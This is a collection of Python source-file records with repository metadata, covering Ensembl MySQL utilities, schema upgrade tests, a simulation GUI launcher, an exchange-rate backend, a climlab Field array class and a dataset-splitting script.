from .sim_model import SimModel
from .i_sim_model import ISimModel
from .sim_array import SimArray
from .sim_array_view import SimArrayView
from .sim_pstudy import SimPStudy
from .sim_output import SimOut
| 0 | 0 | 0 |
fba1cc411163b25b7360c734749b5a68e6e1fd88 | 1,887 | py | Python | ensembl_prodinf/db_utils.py | danstaines/ensembl-prodinf | 65c51ac7f2dd4fe12b051f417ca252979916798b | [
"Apache-2.0"
] | null | null | null | ensembl_prodinf/db_utils.py | danstaines/ensembl-prodinf | 65c51ac7f2dd4fe12b051f417ca252979916798b | [
"Apache-2.0"
] | null | null | null | ensembl_prodinf/db_utils.py | danstaines/ensembl-prodinf | 65c51ac7f2dd4fe12b051f417ca252979916798b | [
"Apache-2.0"
] | null | null | null | # Utilities for interacting with databases
import os
from urllib.parse import urlparse
from sqlalchemy import create_engine, text
from ensembl_prodinf.server_utils import get_file_sizes
from sqlalchemy.engine.url import make_url
def list_databases(db_uri, query):
"""
List databases on a specified MySQL server
Arguments:
db_uri : URI of MySQL server e.g. mysql://user@host:3306/
query : optional regular expression to filter databases e.g. .*_core_.*
"""
valid_uri = validate_mysql_url(db_uri)
engine = create_engine(valid_uri)
if(query == None):
s = text("select schema_name from information_schema.schemata")
else:
s = text("select schema_name from information_schema.schemata where schema_name rlike :q")
with engine.connect() as con:
return [str(r[0]) for r in con.execute(s, {"q": query}).fetchall()]
def get_database_sizes(db_uri, query, dir_name):
"""
List sizes of databases on a specified MySQL server
Arguments:
db_uri : URI of MySQL server e.g. mysql://user@host:3306/ (file system must be accessible)
query : optional regular expression to filter databases e.g. .*_core_.*
dir_name : location of MySQL data files on server
"""
db_list = list_databases(db_uri, query)
url = make_url(db_uri)
dir_path = os.path.join(dir_name, str(url.port), 'data')
sizes = get_file_sizes(url.host, dir_path)
return {db: sizes[db] for db in db_list if db in sizes.keys()}
| 37 | 98 | 0.696873 | # Utilities for interacting with databases
import os
from urllib.parse import urlparse
from sqlalchemy import create_engine, text
from ensembl_prodinf.server_utils import get_file_sizes
from sqlalchemy.engine.url import make_url
def validate_mysql_url(db_uri):
    """Check that *db_uri* is a MySQL URL with an explicit, valid port.

    Returns the URI unchanged on success; raises ValueError otherwise.
    """
    parsed = urlparse(db_uri)
    if parsed.scheme != 'mysql':
        raise ValueError('list_databases can only work with MySQL databases')
    try:
        # Accessing ``parsed.port`` itself raises ValueError for a
        # malformed port; a missing port is rejected explicitly.
        if parsed.port is None:
            raise ValueError('Invalid port number in db_uri')
    except ValueError as err:
        raise ValueError('Invalid port: {}'.format(err))
    return db_uri
def list_databases(db_uri, query):
    """
    List databases on a specified MySQL server
    Arguments:
      db_uri : URI of MySQL server e.g. mysql://user@host:3306/
      query : optional regular expression to filter databases e.g. .*_core_.*

    Returns a list of schema names (as plain strings).
    """
    valid_uri = validate_mysql_url(db_uri)
    engine = create_engine(valid_uri)
    if(query == None):
        s = text("select schema_name from information_schema.schemata")
    else:
        # MySQL "rlike" regexp match; the pattern is bound as a parameter.
        s = text("select schema_name from information_schema.schemata where schema_name rlike :q")
    with engine.connect() as con:
        # The :q parameter is simply unused by the unfiltered statement.
        return [str(r[0]) for r in con.execute(s, {"q": query}).fetchall()]
def get_database_sizes(db_uri, query, dir_name):
    """
    List sizes of databases on a specified MySQL server
    Arguments:
      db_uri : URI of MySQL server e.g. mysql://user@host:3306/ (file system must be accessible)
      query : optional regular expression to filter databases e.g. .*_core_.*
      dir_name : location of MySQL data files on server

    Returns a dict mapping database name to its size entry.
    """
    db_list = list_databases(db_uri, query)
    url = make_url(db_uri)
    # Data files are assumed to live under <dir_name>/<port>/data on the
    # server host -- TODO confirm this layout for the deployment.
    dir_path = os.path.join(dir_name, str(url.port), 'data')
    sizes = get_file_sizes(url.host, dir_path)
    # Only report databases that both exist on the server and have a size entry.
    return {db: sizes[db] for db in db_list if db in sizes.keys()}
| 367 | 0 | 23 |
880d70db0d267353c783a25a4265ba43f300be93 | 782 | py | Python | src/encoded/tests/test_upgrade_source.py | procha2/encoded | e9f122362b71f3b8641023b8d2d5ad531d3484b7 | [
"MIT"
] | 102 | 2015-05-20T01:17:43.000Z | 2022-03-07T06:03:55.000Z | src/encoded/tests/test_upgrade_source.py | procha2/encoded | e9f122362b71f3b8641023b8d2d5ad531d3484b7 | [
"MIT"
] | 901 | 2015-01-07T23:11:57.000Z | 2022-03-18T13:56:12.000Z | src/encoded/tests/test_upgrade_source.py | procha2/encoded | e9f122362b71f3b8641023b8d2d5ad531d3484b7 | [
"MIT"
] | 65 | 2015-02-06T23:00:26.000Z | 2022-01-22T07:58:44.000Z | import pytest
| 35.545455 | 89 | 0.684143 | import pytest
def test_source_upgrade(upgrader, source_1):
    """Upgrading a v1 source to v2 sets status to 'current' and drops the
    award/submitted_by/lab properties."""
    value = upgrader.upgrade('source', source_1, target_version='2')
    assert value['schema_version'] == '2'
    assert value['status'] == 'current'
    assert 'award' not in value
    assert 'submitted_by' not in value
    assert 'lab' not in value
def test_source_upgrade_5_6(upgrader, source_5):
    """Upgrading v5 to v6 maps status 'current' -> 'released' and
    'disabled' -> 'deleted'."""
    value = upgrader.upgrade('source', source_5, current_version='5', target_version='6')
    assert value['schema_version'] == '6'
    assert value['status'] == 'released'
    # Re-run the upgrade on the same fixture with a disabled status.
    source_5['status'] = 'disabled'
    source_5['schema_version'] = '5'
    value = upgrader.upgrade('source', source_5, current_version='5', target_version='6')
    assert value['schema_version'] == '6'
    assert value['status'] == 'deleted'
8515fdec3b7e47b694ca09e5b731ef270e5707c5 | 2,642 | py | Python | robot_explorers/gui/__main__.py | Nino-SEGALA/HuaweiChallenge | a628f5550063422b095300846bde5680a5e95414 | [
"BSD-3-Clause"
] | null | null | null | robot_explorers/gui/__main__.py | Nino-SEGALA/HuaweiChallenge | a628f5550063422b095300846bde5680a5e95414 | [
"BSD-3-Clause"
] | null | null | null | robot_explorers/gui/__main__.py | Nino-SEGALA/HuaweiChallenge | a628f5550063422b095300846bde5680a5e95414 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Authors:
Karl Gäfvert
'''
import argparse
from .gui import GUI
parser = argparse.ArgumentParser(description='Run GUI')
parser.add_argument('input_dir', metavar='input_dir', type=str, help='Path to saved simulation. Ex. "results/10212020_021804"')
parser.add_argument('--fps', type=int, default='2', help='FPS during visualization')
parser.add_argument('--silent-strategy-0', action='store_true', help='Disable strategy 0 simulator output')
parser.add_argument('--silent-strategy-1', action='store_true', help='Disable strategy 1 simulator output')
parser.add_argument('--about', action='store_true', help='Print info and license')
# Args
args = parser.parse_args()
# Print about
if args.about:
print('''Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Karl Gäfvert
Romain Deffayet
''')
exit(0)
gui = GUI(disable_0=args.silent_strategy_0, disable_1=args.silent_strategy_1)
gui.play_from_file(args.input_dir, fps=args.fps)
| 42.612903 | 128 | 0.746026 | # -*- coding: utf-8 -*-
'''
Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Authors:
Karl Gäfvert
'''
import argparse
from .gui import GUI
parser = argparse.ArgumentParser(description='Run GUI')
parser.add_argument('input_dir', metavar='input_dir', type=str, help='Path to saved simulation. Ex. "results/10212020_021804"')
parser.add_argument('--fps', type=int, default='2', help='FPS during visualization')
parser.add_argument('--silent-strategy-0', action='store_true', help='Disable strategy 0 simulator output')
parser.add_argument('--silent-strategy-1', action='store_true', help='Disable strategy 1 simulator output')
parser.add_argument('--about', action='store_true', help='Print info and license')
# Args
args = parser.parse_args()
# Print about
if args.about:
print('''Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Karl Gäfvert
Romain Deffayet
''')
exit(0)
gui = GUI(disable_0=args.silent_strategy_0, disable_1=args.silent_strategy_1)
gui.play_from_file(args.input_dir, fps=args.fps)
| 0 | 0 | 0 |
d7a4e00fe1c08fb5478a7ee1767b733ba5867aef | 3,113 | py | Python | djmoney_rates/backends.py | Songtrust/django-money-rates | a2b9e7d31d1799751e7dfaf6cb5094256530e79e | [
"BSD-3-Clause"
] | null | null | null | djmoney_rates/backends.py | Songtrust/django-money-rates | a2b9e7d31d1799751e7dfaf6cb5094256530e79e | [
"BSD-3-Clause"
] | 1 | 2022-02-01T18:28:43.000Z | 2022-02-01T20:42:05.000Z | djmoney_rates/backends.py | Songtrust/django-money-rates | a2b9e7d31d1799751e7dfaf6cb5094256530e79e | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
import logging
import json
from django.core.exceptions import ImproperlyConfigured
from urllib.request import urlopen
from .exceptions import RateBackendError
from .models import RateSource, Rate
from .settings import money_rates_settings
logger = logging.getLogger(__name__)
| 31.765306 | 97 | 0.638612 | from __future__ import unicode_literals
import logging
import json
from django.core.exceptions import ImproperlyConfigured
from urllib.request import urlopen
from .exceptions import RateBackendError
from .models import RateSource, Rate
from .settings import money_rates_settings
logger = logging.getLogger(__name__)
class BaseRateBackend(object):
source_name = None
base_currency = None
def get_source_name(self):
"""
Return the name that identifies the ratings source
"""
if not self.source_name:
raise RateBackendError("'source_name' can't be empty or "
"you should override 'get_source_name'")
return self.source_name
def get_base_currency(self):
"""
Return the base currency to which the rates are referred
"""
if not self.base_currency:
raise RateBackendError("'base_currency' can't be empty or "
"you should override 'get_base_currency'")
return self.base_currency
def get_rates(self):
"""
Return a dictionary that maps currency code with its rate value
"""
raise NotImplementedError
def update_rates(self):
"""
Creates or updates rates for a source
"""
source, created = RateSource.objects.get_or_create(name=self.get_source_name())
source.base_currency = self.get_base_currency()
source.save()
for currency, value in self.get_rates().items():
try:
rate = Rate.objects.get(source=source, currency=currency)
except Rate.DoesNotExist:
rate = Rate(source=source, currency=currency)
rate.value = value
rate.save()
class OpenExchangeBackend(BaseRateBackend):
    # Backend that fetches exchange rates from the openexchangerates.org JSON API.
    source_name = "openexchange.org"
    def __init__(self):
        """Validate settings and precompute the full API request URL.

        Raises ImproperlyConfigured when OPENEXCHANGE_URL or
        OPENEXCHANGE_APP_ID is empty/missing in project settings.
        """
        if not money_rates_settings.OPENEXCHANGE_URL:
            raise ImproperlyConfigured(
                "OPENEXCHANGE_URL setting should not be empty when using OpenExchangeBackend")
        if not money_rates_settings.OPENEXCHANGE_APP_ID:
            raise ImproperlyConfigured(
                "OPENEXCHANGE_APP_ID setting should not be empty when using OpenExchangeBackend")
        # Build the base api url
        base_url = "%s?app_id=%s" % (money_rates_settings.OPENEXCHANGE_URL,
                                     money_rates_settings.OPENEXCHANGE_APP_ID)
        # Change the base currency whether it is specified in settings
        base_url += "&base=%s" % self.get_base_currency()
        self.url = base_url
    def get_rates(self):
        """Fetch the remote JSON document and return its 'rates' mapping.

        Any failure (network error, bad JSON, missing 'rates' key) is logged
        and re-raised as RateBackendError so callers see one exception type.
        """
        try:
            logger.debug("Connecting to url %s" % self.url)
            data = urlopen(self.url).read().decode("utf-8")
            return json.loads(data)['rates']
        except Exception as e:
            logger.exception("Error retrieving data from %s", self.url)
            raise RateBackendError("Error retrieving rates: %s" % e)
    def get_base_currency(self):
        # Base currency comes straight from settings; no fallback applied here.
        return money_rates_settings.OPENEXCHANGE_BASE_CURRENCY
| 1,151 | 1,593 | 46 |
3350009913018054be2ddf059f93dbc77731d306 | 10,721 | py | Python | climlab/domain/field.py | nfeldl/climlab | 2cabb49e2c3f54c1795f24338ef5ee44e49fc7e7 | [
"BSD-3-Clause",
"MIT"
] | 160 | 2015-02-25T15:56:37.000Z | 2022-03-14T23:51:23.000Z | climlab/domain/field.py | nfeldl/climlab | 2cabb49e2c3f54c1795f24338ef5ee44e49fc7e7 | [
"BSD-3-Clause",
"MIT"
] | 137 | 2015-12-18T17:39:31.000Z | 2022-02-04T20:50:53.000Z | climlab/domain/field.py | nfeldl/climlab | 2cabb49e2c3f54c1795f24338ef5ee44e49fc7e7 | [
"BSD-3-Clause",
"MIT"
] | 54 | 2015-04-28T05:57:39.000Z | 2022-02-17T08:15:11.000Z | # Trying a new data model for state variables and domains:
# Create a new sub-class of numpy.ndarray
# that has as an attribute the domain itself
# Following a tutorial on subclassing ndarray here:
#
# http://docs.scipy.org/doc/numpy/user/basics.subclassing.html
from __future__ import division
import numpy as np
from climlab.domain.xarray import Field_to_xarray
class Field(np.ndarray):
"""Custom class for climlab gridded quantities, called Field.
This class behaves exactly like :py:class:`numpy.ndarray`
but every object has an attribute called ``self.domain``
which is the domain associated with that field (e.g. state variables).
**Initialization parameters** \n
An instance of ``Field`` is initialized with the following
arguments:
:param array input_array: the array which the Field object should be
initialized with
:param domain: the domain associated with that field
(e.g. state variables)
:type domain: :class:`~climlab.domain.domain._Domain`
**Object attributes** \n
Following object attribute is generated during initialization:
:var domain: the domain associated with that field
(e.g. state variables)
:vartype domain: :class:`~climlab.domain.domain._Domain`
:Example:
::
>>> import climlab
>>> import numpy as np
>>> from climlab import domain
>>> from climlab.domain import field
>>> # distribution of state
>>> distr = np.linspace(0., 10., 30)
>>> # domain creation
>>> sfc, atm = domain.single_column()
>>> # build state of type Field
>>> s = field.Field(distr, domain=atm)
>>> print s
[ 0. 0.34482759 0.68965517 1.03448276 1.37931034
1.72413793 2.06896552 2.4137931 2.75862069 3.10344828
3.44827586 3.79310345 4.13793103 4.48275862 4.82758621
5.17241379 5.51724138 5.86206897 6.20689655 6.55172414
6.89655172 7.24137931 7.5862069 7.93103448 8.27586207
8.62068966 8.96551724 9.31034483 9.65517241 10. ]
>>> print s.domain
climlab Domain object with domain_type=atm and shape=(30,)
>>> # can slice this and it preserves the domain
>>> # a more full-featured implementation would have intelligent
>>> # slicing like in iris
>>> s.shape == s.domain.shape
True
>>> s[:1].shape == s[:1].domain.shape
False
>>> # But some things work very well. E.g. new field creation:
>>> s2 = np.zeros_like(s)
>>> print s2
[ 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.
0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
>>> print s2.domain
climlab Domain object with domain_type=atm and shape=(30,)
"""
## Loosely based on the approach in numpy.ma.core.MaskedArray
# This determines how we slice a Field object
def __getitem__(self, indx):
"""
x.__getitem__(y) <==> x[y]
Return the item described by i, as a Field.
"""
# create a view of just the data as np.ndarray and slice it
dout = self.view(np.ndarray)[indx]
try:
#Force dout to type Field
dout = dout.view(type(self))
# Now slice the domain
dout.domain = self.domain[indx]
# Inherit attributes from self
if hasattr(self, 'interfaces'):
dout.interfaces = self.interfaces
except:
# The above will fail if we extract a single item
# in which case we should just return the item
pass
return dout
def to_xarray(self):
"""Convert Field object to xarray.DataArray"""
return Field_to_xarray(self)
def global_mean(field):
    """Calculates the latitude weighted global mean of a field
    with latitude dependence.
    :param Field field: input field
    :raises: :exc:`ValueError` if input field has no latitude axis
    :return: latitude weighted global mean of the field
    :rtype: float
    :Example:
    initial global mean temperature of EBM model::
        >>> import climlab
        >>> model = climlab.EBM()
        >>> climlab.global_mean(model.Ts)
        Field(11.997968598413685)
    """
    # NOTE(review): relies on module-level helpers _global_mean and
    # _global_mean_latlon, which are not defined in this excerpt.
    try:
        lat = field.domain.lat.points
    # NOTE(review): bare 'except' catches every error here, not only a
    # missing 'lat' attribute -- presumably AttributeError is intended.
    except:
        raise ValueError('No latitude axis in input field.')
    try:
        # Field is 2D latitude / longitude
        lon = field.domain.lon.points
        return _global_mean_latlon(field.squeeze())
    except:
        # Field is 1D latitude only (zonal average)
        # NOTE(review): any error raised inside _global_mean_latlon also
        # lands here and silently falls back to the zonal-average path.
        lat_radians = np.deg2rad(lat)
        return _global_mean(field.squeeze(), lat_radians)
def to_latlon(array, domain, axis = 'lon'):
    """Broadcasts a 1D axis dependent array across another axis.
    :param array input_array: the 1D array used for broadcasting
    :param domain: the domain associated with that
                   array
    :param axis: the axis that the input array will
                 be broadcasted across
                 [default: 'lon']
    :return: Field with the same shape as the
             domain
    :Example:
        ::
            >>> import climlab
            >>> from climlab.domain.field import to_latlon
            >>> import numpy as np
            >>> state = climlab.surface_state(num_lat=3, num_lon=4)
            >>> m = climlab.EBM_annual(state=state)
            >>> insolation = np.array([237., 417., 237.])
            >>> insolation = to_latlon(insolation, domain = m.domains['Ts'])
            >>> insolation.shape
            (3, 4, 1)
    """
    # Remember which axis the 1D input is broadcast across BEFORE the name
    # 'axis' gets reused: the original code unpacked a meshgrid output into
    # 'axis', so the later comparison against 'lat' could never succeed.
    broadcast_axis = axis
    # With default 'xy' indexing, np.meshgrid(x, y, z) returns arrays of
    # shape (len(y), len(x), len(z)) -- i.e. (len(array), n_axis, n_depth).
    axis_points, array, _depth = np.meshgrid(domain.axes[broadcast_axis].points, array,
                                             domain.axes['depth'].points)
    if broadcast_axis == 'lat':
        # Input was longitude dependent: meshgrid yields (lon, lat, depth),
        # so swap the first two axes to match the (lat, lon, depth) domain.
        # (The original discarded the np.swapaxes result instead of
        # reassigning it.)
        array = np.swapaxes(array, 1, 0)
    return Field(array, domain=domain)
| 38.01773 | 86 | 0.566179 | # Trying a new data model for state variables and domains:
# Create a new sub-class of numpy.ndarray
# that has as an attribute the domain itself
# Following a tutorial on subclassing ndarray here:
#
# http://docs.scipy.org/doc/numpy/user/basics.subclassing.html
from __future__ import division
import numpy as np
from climlab.domain.xarray import Field_to_xarray
class Field(np.ndarray):
"""Custom class for climlab gridded quantities, called Field.
This class behaves exactly like :py:class:`numpy.ndarray`
but every object has an attribute called ``self.domain``
which is the domain associated with that field (e.g. state variables).
**Initialization parameters** \n
An instance of ``Field`` is initialized with the following
arguments:
:param array input_array: the array which the Field object should be
initialized with
:param domain: the domain associated with that field
(e.g. state variables)
:type domain: :class:`~climlab.domain.domain._Domain`
**Object attributes** \n
Following object attribute is generated during initialization:
:var domain: the domain associated with that field
(e.g. state variables)
:vartype domain: :class:`~climlab.domain.domain._Domain`
:Example:
::
>>> import climlab
>>> import numpy as np
>>> from climlab import domain
>>> from climlab.domain import field
>>> # distribution of state
>>> distr = np.linspace(0., 10., 30)
>>> # domain creation
>>> sfc, atm = domain.single_column()
>>> # build state of type Field
>>> s = field.Field(distr, domain=atm)
>>> print s
[ 0. 0.34482759 0.68965517 1.03448276 1.37931034
1.72413793 2.06896552 2.4137931 2.75862069 3.10344828
3.44827586 3.79310345 4.13793103 4.48275862 4.82758621
5.17241379 5.51724138 5.86206897 6.20689655 6.55172414
6.89655172 7.24137931 7.5862069 7.93103448 8.27586207
8.62068966 8.96551724 9.31034483 9.65517241 10. ]
>>> print s.domain
climlab Domain object with domain_type=atm and shape=(30,)
>>> # can slice this and it preserves the domain
>>> # a more full-featured implementation would have intelligent
>>> # slicing like in iris
>>> s.shape == s.domain.shape
True
>>> s[:1].shape == s[:1].domain.shape
False
>>> # But some things work very well. E.g. new field creation:
>>> s2 = np.zeros_like(s)
>>> print s2
[ 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.
0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
>>> print s2.domain
climlab Domain object with domain_type=atm and shape=(30,)
"""
def __new__(cls, input_array, domain=None, interfaces=False):
# Input array is an already formed ndarray instance
# We first cast to be our class type
#obj = np.asarray(input_array).view(cls)
# This should ensure that shape is (1,) for scalar input
#obj = np.atleast_1d(input_array).view(cls)
# add the new attribute to the created instance
# do some checking for correct dimensions
# input argument interfaces indicates whether input_array exists
# on cell interfaces for each dimensions
# It should be either a single Boolean
# or an array of Booleans compatible with number of dimensions
if input_array is None:
return None
else:
try:
shape = np.array(domain.shape) + np.where(interfaces,1,0)
except:
raise ValueError('domain and interfaces inconsistent.')
try:
#assert obj.shape == domain.shape
# This will work if input_array is any of:
# - scalar
# - same shape as domain
# - broadcast-compatible with domain shape
obj = (input_array * np.ones(shape)).view(cls)
assert np.all(obj.shape == shape)
except:
try:
# Do we get a match if we add a singleton dimension
# (e.g. a singleton depth axis)?
obj = np.expand_dims(input_array, axis=-1).view(cls)
assert np.all(obj.shape == shape)
#obj = np.transpose(np.atleast_2d(obj))
#if obj.shape == domain.shape:
# obj.domain = domain
except:
raise ValueError('Cannot reconcile shapes of input_array and domain.')
obj.domain = domain
obj.interfaces = interfaces
# would be nice to have some automatic domain creation here if none given
# Finally, we must return the newly created object:
return obj
def __array_finalize__(self, obj):
# ``self`` is a new object resulting from
# ndarray.__new__(Field, ...), therefore it only has
# attributes that the ndarray.__new__ constructor gave it -
# i.e. those of a standard ndarray.
#
# We could have got to the ndarray.__new__ call in 3 ways:
# From an explicit constructor - e.g. Field():
# obj is None
# (we're in the middle of the Field.__new__
# constructor, and self.domain will be set when we return to
# Field.__new__)
if obj is None: return
# From view casting - e.g arr.view(Field):
# obj is arr
# (type(obj) can be Field)
# From new-from-template - e.g statearr[:3]
# type(obj) is Field
#
# Note that it is here, rather than in the __new__ method,
# that we set the default value for 'domain', because this
# method sees all creation of default objects - with the
# Field.__new__ constructor, but also with
# arr.view(Field).
try:
self.domain = obj.domain
except:
self.domain = None
try:
self.interfaces = obj.interfaces
except:
pass
# We do not need to return anything
## Loosely based on the approach in numpy.ma.core.MaskedArray
# This determines how we slice a Field object
def __getitem__(self, indx):
"""
x.__getitem__(y) <==> x[y]
Return the item described by i, as a Field.
"""
# create a view of just the data as np.ndarray and slice it
dout = self.view(np.ndarray)[indx]
try:
#Force dout to type Field
dout = dout.view(type(self))
# Now slice the domain
dout.domain = self.domain[indx]
# Inherit attributes from self
if hasattr(self, 'interfaces'):
dout.interfaces = self.interfaces
except:
# The above will fail if we extract a single item
# in which case we should just return the item
pass
return dout
def to_xarray(self):
"""Convert Field object to xarray.DataArray"""
return Field_to_xarray(self)
def global_mean(field):
"""Calculates the latitude weighted global mean of a field
with latitude dependence.
:param Field field: input field
:raises: :exc:`ValueError` if input field has no latitude axis
:return: latitude weighted global mean of the field
:rtype: float
:Example:
initial global mean temperature of EBM model::
>>> import climlab
>>> model = climlab.EBM()
>>> climlab.global_mean(model.Ts)
Field(11.997968598413685)
"""
try:
lat = field.domain.lat.points
except:
raise ValueError('No latitude axis in input field.')
try:
# Field is 2D latitude / longitude
lon = field.domain.lon.points
return _global_mean_latlon(field.squeeze())
except:
# Field is 1D latitude only (zonal average)
lat_radians = np.deg2rad(lat)
return _global_mean(field.squeeze(), lat_radians)
def _global_mean(array, lat_radians):
# Use np.array() here to strip the Field data and return a plain array
# (This will be more graceful once we are using xarray.DataArray
# for all internal grid info instead of the Field object)
return np.array(np.average(array, weights=np.cos(lat_radians)))
def _global_mean_latlon(field):
    """Area-weighted global mean of a 2D (lat, lon) field, as a plain ndarray."""
    grid = field.domain
    lon2d, lat2d = np.meshgrid(grid.lon.points, grid.lat.points)
    lat_widths = np.deg2rad(np.diff(grid.lat.bounds))
    lon_widths = np.deg2rad(np.diff(grid.lon.bounds)) * np.cos(np.deg2rad(lat2d))
    cell_area = lon_widths * lat_widths[:, np.newaxis]  # grid cell area in radians^2
    return np.array(np.average(field, weights=cell_area))
def to_latlon(array, domain, axis = 'lon'):
    """Broadcasts a 1D axis dependent array across another axis.
    :param array input_array: the 1D array used for broadcasting
    :param domain: the domain associated with that
                   array
    :param axis: the axis that the input array will
                 be broadcasted across
                 [default: 'lon']
    :return: Field with the same shape as the
             domain
    :Example:
        ::
            >>> import climlab
            >>> from climlab.domain.field import to_latlon
            >>> import numpy as np
            >>> state = climlab.surface_state(num_lat=3, num_lon=4)
            >>> m = climlab.EBM_annual(state=state)
            >>> insolation = np.array([237., 417., 237.])
            >>> insolation = to_latlon(insolation, domain = m.domains['Ts'])
            >>> insolation.shape
            (3, 4, 1)
    """
    # Remember which axis the 1D input is broadcast across BEFORE the name
    # 'axis' gets reused: the original code unpacked a meshgrid output into
    # 'axis', so the later comparison against 'lat' could never succeed.
    broadcast_axis = axis
    # With default 'xy' indexing, np.meshgrid(x, y, z) returns arrays of
    # shape (len(y), len(x), len(z)) -- i.e. (len(array), n_axis, n_depth).
    axis_points, array, _depth = np.meshgrid(domain.axes[broadcast_axis].points, array,
                                             domain.axes['depth'].points)
    if broadcast_axis == 'lat':
        # Input was longitude dependent: meshgrid yields (lon, lat, depth),
        # so swap the first two axes to match the (lat, lon, depth) domain.
        # (The original discarded the np.swapaxes result instead of
        # reassigning it.)
        array = np.swapaxes(array, 1, 0)
    return Field(array, domain=domain)
| 3,914 | 0 | 99 |
1c219888920e1a8bc93025db5532422bfc527d70 | 543 | py | Python | splitData.py | csortu/drugMLPytorch | 7ea6ef8c46dc3027a7ebd21836b7b12c23659db8 | [
"MIT"
] | null | null | null | splitData.py | csortu/drugMLPytorch | 7ea6ef8c46dc3027a7ebd21836b7b12c23659db8 | [
"MIT"
] | null | null | null | splitData.py | csortu/drugMLPytorch | 7ea6ef8c46dc3027a7ebd21836b7b12c23659db8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 13 13:32:14 2019
@author: ortutay
"""
import pandas as pd
import numpy as np
link = 'http://bit.ly/uforeports'
ufo = pd.read_csv(link)
# We split 60-20-20% tran-validation-test sets
train, validate, test = np.split(ufo.sample(frac=1),
[int(.6*len(ufo)),int(.8*len(ufo))])
a = pd.DataFrame({'col1': np.arange(1, 21),'col2': np.arange(21,41)})
train, validate, test = np.split(a.sample(frac=1), [int(.8 * len(a)), int(.9 * len(a))]) | 23.608696 | 88 | 0.598527 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 13 13:32:14 2019
@author: ortutay
"""
import pandas as pd
import numpy as np
link = 'http://bit.ly/uforeports'
ufo = pd.read_csv(link)
# We split 60-20-20% tran-validation-test sets
train, validate, test = np.split(ufo.sample(frac=1),
[int(.6*len(ufo)),int(.8*len(ufo))])
a = pd.DataFrame({'col1': np.arange(1, 21),'col2': np.arange(21,41)})
train, validate, test = np.split(a.sample(frac=1), [int(.8 * len(a)), int(.9 * len(a))]) | 0 | 0 | 0 |
db3dbbc1512ecbbd2e1ba563130b86c31b5d740a | 3,867 | py | Python | packages/fetchai/connections/p2p_stub/connection.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/connections/p2p_stub/connection.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/connections/p2p_stub/connection.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
